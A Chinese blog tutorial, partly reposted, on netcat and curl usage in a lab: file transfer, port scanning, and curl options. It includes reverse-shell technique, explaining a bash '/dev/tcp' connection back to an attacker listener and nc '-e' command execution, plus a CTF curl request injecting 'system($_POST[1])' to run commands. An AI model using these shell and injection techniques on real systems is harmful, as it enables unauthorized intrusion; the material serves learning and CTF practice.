【原创】浅谈nc与curl

[huayang]

NC

nc被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据

实验环境

操作系统IP地址
kali 2021172.16.231.128
macOS 172.16.231.1

简单的交互

-l:使用监听模式,监控传入的信息

macOS开启监听

kali链接2333

输入的任何信息都会被对方看见

公网也是可以的

上传文件到远程

测试的时候确定一下服务器当前测试目录和本地有无相同文件

在CentOS远程服务器运行:

nc -lv 2333 > 1.php

在kali上运行

nc *.*.*.* 2333 < 1.php  

弹出本地ip即为链接成功,在推出即可

看看文件是否有内容

注意:在本地上传的时候尽量用ip,如果用域名进行上传则会出现文件无内容的情况

从远程下载文件到本地

以下很多功能我都无法复现,就直接转载国光师傅的文章

https://www.sqlsec.com/2019/10/nc.html

命令交互

-e:将传入的信息以命令执行

这个应该被防火墙拦截了,无法实验

持久监听

-k: 客户端断掉连接时,服务端依然保持运行
-v:现实指令执行过程细节

内网弹shell

ncat简单调整是可以穿内网的

操作系统IP地址
macOS 10.13.6内网
CentOSwww.sqlsec.com

首先外网的CentOS服务器先监听本地端口:

-w: 设置等待连线的时间秒数

bash弹shell

如果控制的目标机器自带的nc不支持-e选项,那如何将shell弹出去呢?这里可以利用自带的bash命令交互环境来实现这个操作:

攻击者外网监听:

-p port 本地端口

命令参数解释
bash -i产生一个bash交互环境
>&将联合符号前面的内容与后面结合然后一起重定向给后者
/dev/tcp/10.211.55.4/2333让目标主机与主机10.211.55.4的2333端口简历一个连接
0>&1将标准的输入与标准输出内容相结合,然后重定向给前面的标准输出内容

端口扫描

意义不大,实测不行,本地无法扫,云端无法精确识别

端口扫描

范围扫描

ncat不支持端口扫描,但是原始的nc可以扫描端口。

-n: 直接使用ip地址,而不通过域名服务器
-z: 使用0输入/输出模式,只在扫描通信端口时使用

这里扫描10.211.55.14的20-25这个端口范围:Bash

# sqlsec @ X1cT34m-iMac in ~
$ nc -v -n -z 10.211.55.14 20-25
10.211.55.14 22 (ssh) open

可以发现成功扫描出22端口是开放的了

单个扫描

Bash

# sqlsec @ X1cT34m-iMac in ~
$ nc -v -z -n 10.211.55.14 22 
10.211.55.14 22 (ssh) open

nc的命令可以写在一起的,下面两条命令的作用相同:Bash

$ nc -v -z -n 10.211.55.14 22 
$ nc -vzn 10.211.55.14 22

CURL

获取页面响应内容

curl https://hellohy.top

获取请求头信息

 curl  -I https://hellohy.top

进行post传值

-d ""
curl "http://aaf32bea-1e67-468a-8a86-79bca7efa5d8.challenge.ctf.show:8080/?c=system(%24_POST[1]);" -d "1=ls"

注:这里的$(%24)必须要进行url编码

尽量c后面的全部进行url编码

修改请求头的ip

curl http://ctf5.shiyanbar.com/phpaudit/ -H "x-forwarded-for:127.0.0.1"

保存文件

 curl -o index.html "https://hellohy.top/"
curl -o 1.png  https://hellohy.top/imgs/%E7%BD%91%E7%AB%99%E7%BB%93%E6%9E%84%20V2.0.png

文件后缀要和保存的文件格式一致

设置代理

curl -x 192.168.100.100:1080 http://www.linux.com

user-agent

curl -A “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.0)” http://www.linux.com

上传文件

curl -T dodo1.JPG -u 用户名:密码 ftp://www.linux.com/img/

向服务器发送 Cookie

curl -b 'foo=bar' https://google.com

[/huayang]

参考文章:

linux curl命令详解(附使用示例)

ctf—curl的使用

常用的curl命令及参数详解

nc命令教程

curl 的用法指南

==>转载请注明来源哦<==
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇